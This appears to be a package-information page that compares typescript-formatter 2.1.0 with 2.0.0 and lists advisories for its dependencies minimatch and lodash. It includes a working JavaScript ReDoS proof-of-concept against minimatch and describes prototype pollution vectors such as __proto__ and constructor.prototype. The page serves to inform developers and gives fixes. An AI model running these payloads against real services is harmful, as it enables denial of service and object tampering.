Typescript-formatter is a valuable tool for developers seeking to automatically format Typescript code, ensuring consistency and readability across projects. Comparing version 2.1.0 with its predecessor, version 2.0.0, reveals key updates that improve the developer experience. Both versions maintain the core dependencies of commandpost, editorconfig, and glob-expand, crucial for command-line interaction, editor configuration integration, and file matching, respectively.
However, the devDependencies showcase notable changes. Version 2.1.0 introduces grunt-contrib-clean at version 1.0.0 for cleaning files and folders before building, and grunt-conventional-changelog is bumped to version 6.1.0 to generate changelogs automatically using conventional commits. A new devDependency named es6-promise (version 3.1.2) was also added. Most notably, the included Typescript version is updated from 1.7.5 to 1.8.2 and TSLint is updated from 3.3.0 to 3.5.0. This is important since those tools are used during the developing phase. These improvements likely address bugs or improve the internal formatter's performance.
Version 2.1.0 continues to declare its peer dependencies on typescript versions, compatible with version 1.0.0 and any versions greater than or equal to 1.8.0-dev or 1.9.0-dev. Developers should benefit from taking advantage of these improvements.
All the vulnerabilities related to the version 2.1.0 of the package
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
Command Injection in lodash
lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.
Prototype Pollution in lodash
Versions of lodash before 4.17.11 are vulnerable to prototype pollution.
The vulnerable functions are 'defaultsDeep', 'merge', and 'mergeWith' which allow a malicious user to modify the prototype of Object via {constructor: {prototype: {...}}} causing the addition or modification of an existing property that will exist on all objects.
Update to version 4.17.11 or later.
Prototype Pollution in lodash
Versions of lodash before 4.17.5 are vulnerable to prototype pollution.
The vulnerable functions are 'defaultsDeep', 'merge', and 'mergeWith' which allow a malicious user to modify the prototype of Object via __proto__ causing the addition or modification of an existing property that will exist on all objects.
Update to version 4.17.5 or later.
Prototype Pollution in lodash
Versions of lodash before 4.17.12 are vulnerable to Prototype Pollution. The function defaultsDeep allows a malicious user to modify the prototype of Object via {constructor: {prototype: {...}}} causing the addition or modification of an existing property that will exist on all objects.
Update to version 4.17.12 or later.